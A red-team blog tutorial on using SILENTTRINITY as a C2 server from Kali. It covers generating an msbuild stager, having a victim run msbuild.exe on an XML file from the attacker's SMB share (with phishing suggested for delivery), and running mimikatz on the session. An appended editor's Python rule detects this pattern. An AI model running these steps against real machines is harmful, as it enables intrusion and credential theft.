The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

There’s been a disturbance in the red team field, have you felt it? It’s C#. More mature environments have finally caught on that PowerShell can be used for malicious gains and that pentesters could own a domain with a few PowerShell commands, so admins have begun to lock it down and EDRs have begun to alert, and, as the saying goes, necessity is the mother of invention.

So why C#? Simply put, it has access to the .NET framework just like PowerShell does. The other big reason is that Microsoft ships executables, installed by default with Windows 10, that will compile and execute C# code. Matt Graeber found one of those executables and did an excellent write-up of it here. The TL;DR is that Microsoft.Workflow.Compiler.exe, which is installed as part of the .NET framework, will run C# code contained in an XOML file. There’s been a huge movement toward LOL (living off the land) tactics, meaning you use what is already at your disposal instead of downloading things to victim machines, so this is huge. Of course, people immediately started looking at how to weaponize this, since msbuild.exe is another binary that will compile and run C# code. byt3bl33d3r, who wrote crackmapexec, Empire, and DeathStar, developed a tool called SILENTTRINITY, which uses IronPython to write the C# payload in Python and then generates the XML project file needed by msbuild (if that payload option is chosen). This is how it works:

On Kali, install Python 3:

apt-get install python3.7
apt-get install python3.7-dev

Then download SILENTTRINITY:

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Then install the requirements:

cd SILENTTRINITY
python3.7 -m pip install -r requirements.txt

Then start SILENTTRINITY:

cd Server
python3.7 st.py

Before starting SILENTTRINITY we’ll spin up a Samba server, so that we don’t have to drop files to disk on the target and can instead fetch the payload over an SMB path. To do this, impacket has a set of tools in its GitHub repository here, one of which is smbserver.py, which spins up a quick SMB server.

First download and install the impacket repository:

git clone https://github.com/SecureAuthCorp/impacket.git 

cd impacket

pip install -r requirements.txt

python setup.py install

Then create a folder that will be shared:

mkdir /root/SMB

Then run smbserver.py. Since it was ‘installed’, it can be run from anywhere via:

smbserver.py SMB /root/SMB


Then start SILENTTRINITY:

cd SILENTTRINITY/Server/
python3.7 st.py

You should then see this:

(screenshot: st)

Next is to spin up an HTTP listener, as shown below.

(screenshot: run)

Once that is spun up, the next step is to generate the actual stager, which is what will be executed on the target. In this case, we’re using msbuild.

(screenshot: stager)

The XML file is generated in the same directory as st.py, so copy it to the Samba share that was created earlier, which in this case is /root/SMB:

cp msbuild.xml /root/SMB

(screenshot: msbuild)

Finally, the trick is to get the victim to execute the XML file via the SMB path. Of course this is easy if you already have a shell on the machine; otherwise it’s possible to embed this link in a phishing email.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.43.248\SMB\msbuild.xml

(screenshot: runcmd)

You’ll see a command prompt open up, and if you look back at SILENTTRINITY, you’ll have a session.

(screenshot: session)

And to list the sessions:

(screenshot: list)

Now you can run modules against that session, as in Empire:

(screenshot: modules)

e.g. mimikatz:

(screenshot: mimikatz)

The purpose of this is to show that you never have to drop files to disk and can execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug in msbuild.exe or Microsoft.Workflow.Compiler.exe; those binaries are meant to do this, we’re just exploiting it for offensive purposes.
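Because the binaries are behaving as designed, the defensive angle is visibility rather than patching: a process-creation event where msbuild.exe or Microsoft.Workflow.Compiler.exe is started with a project/XOML file, and especially one pulled from a UNC path as in the command above, is what a blue team would look for. The following is an added example from the editor, not code from the post or from SILENTTRINITY: a small Python rule that scores constructed process-creation events in a pipe-delimited Key=Value format (the format, field names, sample paths, user names and the list of suspicious parent processes are all assumptions made for this example; only the two binary names and the 192.168.43.248 share address come from the post).

```python
"""
Score process-creation events for the two "living off the land" compilers
named in the post: msbuild.exe and Microsoft.Workflow.Compiler.exe.

Input format (constructed for this example, not a real product's log):
    Time=...|Image=<full path>|CommandLine=<cmd>|ParentImage=<full path>|User=<user>
"""
import re
from typing import Dict, List, Optional

# Binaries named in the post. Matching is on the file name only, so a
# renamed copy is NOT caught by this rule; pair it with hash-based telemetry.
WATCHED_IMAGES = {"msbuild.exe", "microsoft.workflow.compiler.exe"}

# Assumed list of parents from which a build tool rarely starts legitimately
# (Office apps and script hosts, i.e. the phishing delivery the post mentions).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}

# \\host\share\...  (two leading backslashes, a host, a backslash, the rest)
UNC_PATH = re.compile(r"\\\\[\w.-]+\\\S+")
# Project / workflow files these binaries will compile and run.
PROJECT_FILE = re.compile(r"\.(?:xml|xoml|csproj|proj)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'Key=Value|Key=Value' line into a dict; parts without '=' are ignored."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def assess(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for a watched binary, or None for anything else."""
    image = basename(event.get("Image", ""))
    if image not in WATCHED_IMAGES:
        return None
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons: List[str] = []
    severity = "low"                      # watched binary, nothing else odd
    if PROJECT_FILE.search(cmd):
        reasons.append("project/XOML file passed on the command line")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched from {parent}")
        severity = "medium"
    unc = UNC_PATH.search(cmd)
    if unc:                               # payload never touched local disk
        reasons.append(f"input fetched over SMB from {unc.group(0)}")
        severity = "high"
    return {"image": image, "parent": parent, "user": event.get("User", ""),
            "severity": severity, "reasons": reasons}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run assess() over raw log lines and keep only the alerts."""
    return [a for a in (assess(parse_event(line)) for line in lines) if a]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    r"Time=2019-01-10T14:02:11Z|Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe"
    r"|CommandLine=msbuild.exe \\192.168.43.248\SMB\msbuild.xml"
    r"|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\jdoe",
    r"Time=2019-01-10T14:05:40Z|Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    r"|CommandLine=Microsoft.Workflow.Compiler.exe C:\Users\jdoe\AppData\Local\Temp\run.xoml out.txt"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|User=CORP\jdoe",
    r"Time=2019-01-10T09:12:03Z|Image=C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\MSBuild.exe"
    r"|CommandLine=MSBuild.exe C:\src\app\app.csproj /t:Build"
    r"|ParentImage=C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\IDE\devenv.exe|User=CORP\dev1",
    r"Time=2019-01-10T09:13:55Z|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad.exe C:\notes.txt|ParentImage=C:\Windows\explorer.exe|User=CORP\jdoe",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']:<6}] {alert['image']} <- {alert['parent']} "
              f"({alert['user']}): {'; '.join(alert['reasons']) or 'watched binary'}")
```

The first sample event is the exact pattern from the post (msbuild.exe handed a project file over SMB) and scores high; the developer's local build from devenv.exe scores low so it can be tuned out by baseline, which is the real work: on a host that has no Visual Studio installed, any msbuild.exe execution at all is worth a look.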
